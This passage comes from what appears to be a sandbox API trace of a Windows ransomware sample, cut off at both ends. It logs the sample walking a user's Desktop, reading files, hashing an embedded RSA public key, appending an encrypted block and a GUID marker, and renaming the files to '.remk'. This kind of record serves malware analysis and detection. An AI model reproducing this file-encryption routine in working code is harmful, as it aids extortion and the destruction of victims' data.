| out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd766b20, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x334a4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea7, ftLastWriteTime.dwLowDateTime=0x334a4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="74 ZPVMU", cAlternateFileName="74ZPVM~1")) returned 1 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e018 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325df48 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e3c0 [0231.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e428 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dda8 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e2f0 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e358 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0231.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0231.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0231.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dfb0 | out: hHeap=0x630000) returned 1 [0231.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6e23ce0, ftCreationTime.dwHighDateTime=0x1d5e3be, ftLastAccessTime.dwLowDateTime=0x223a16e0, ftLastAccessTime.dwHighDateTime=0x1d5db95, ftLastWriteTime.dwLowDateTime=0x223a16e0, ftLastWriteTime.dwHighDateTime=0x1d5db95, nFileSizeHigh=0x0, nFileSizeLow=0x8d0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7GTeFnWqgS9ZSpp-9d.png", cAlternateFileName="7GTEFN~1.PNG")) returned 1 [0231.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7GTeFnWqgS9ZSpp-9d.png") returned=".png" [0231.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7GTeFnWqgS9ZSpp-9d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gtefnwqgs9zspp-9d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.108] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=36107) returned 1 [0231.108] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.111] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8ce5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.111] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.113] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.113] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8d0b, lpOverlapped=0x0) returned 1 [0231.113] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.113] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.113] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.113] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.114] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.114] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.115] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.115] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.115] SetLastError (dwErrCode=0x0) [0231.115] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.116] GetLastError () returned 0x0 [0231.116] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.117] SetLastError (dwErrCode=0x0) [0231.117] GetLastError () returned 0x0 [0231.118] SetLastError (dwErrCode=0x0) [0231.118] GetLastError () returned 0x0 [0231.118] SetLastError (dwErrCode=0x0) [0231.118] GetLastError () returned 0x0 [0231.118] SetLastError (dwErrCode=0x0) [0231.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.118] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.118] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.118] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.118] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.118] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d10) returned 0x37b1b70 [0231.119] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b75c8 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd10 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7610 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd58 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcc8 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0231.119] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd58 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd58 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edcc8 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edcb0 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd58 | out: hHeap=0x630000) returned 1 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.121] GetCurrentThreadId () returned 0x314 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697018 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.121] GetCurrentThreadId () returned 0x314 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd58 [0231.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.123] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8d0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.123] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.124] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.124] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.124] CloseHandle (hObject=0x640) returned 1 [0231.126] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7GTeFnWqgS9ZSpp-9d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gtefnwqgs9zspp-9d.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7GTeFnWqgS9ZSpp-9d.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7gtefnwqgs9zspp-9d.png.remk")) returned 1 [0231.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.128] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.130] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca041790, ftCreationTime.dwHighDateTime=0x1d5e07c, ftLastAccessTime.dwLowDateTime=0x136c8240, ftLastAccessTime.dwHighDateTime=0x1d5e407, ftLastWriteTime.dwLowDateTime=0x136c8240, ftLastWriteTime.dwHighDateTime=0x1d5e407, nFileSizeHigh=0x0, nFileSizeLow=0x1402c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AwaZ_7Drvt.mkv", cAlternateFileName="AWAZ_7~1.MKV")) returned 1 [0231.130] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AwaZ_7Drvt.mkv") returned=".mkv" [0231.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AwaZ_7Drvt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\awaz_7drvt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.130] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=81964) returned 1 [0231.130] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.134] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14006, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.134] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.136] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1402c, lpOverlapped=0x0) returned 1 [0231.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.138] lstrlenA (lpString="-----BEGIN PUBLIC 